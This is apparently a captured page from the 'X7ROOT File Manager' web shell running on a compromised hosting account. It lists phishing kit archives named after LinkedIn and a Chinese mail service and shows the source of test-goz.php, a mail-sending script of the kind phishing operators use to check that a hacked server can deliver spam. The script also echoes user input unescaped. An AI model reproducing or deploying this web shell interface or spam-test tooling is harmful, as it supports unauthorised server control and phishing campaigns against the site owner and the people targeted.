X7ROOT File Manager
Current Path:
/home/notabjze/er8th.com
home
/
notabjze
/
er8th.com
/
ðŸ“
..
📄
.htaccess
(197 B)
📄
AZ-ULTIMATE-LINKEDIN.zip
(306.16 KB)
ðŸ“
KR
📄
KR.zip
(570.52 KB)
ðŸ“
cgi-bin
ðŸ“
china-mail
📄
china-mail.zip
(35.61 KB)
ðŸ“
chinn
📄
index.php
(0 B)
ðŸ“
sucess
📄
test-goz.php
(734 B)
📄
wp-links.php
(65.71 KB)
Editing: test-goz.php
<?php error_reporting(0); echo '<b>F-Automatical v8 [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","F-Automatical v8 [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>
Upload File
Create Folder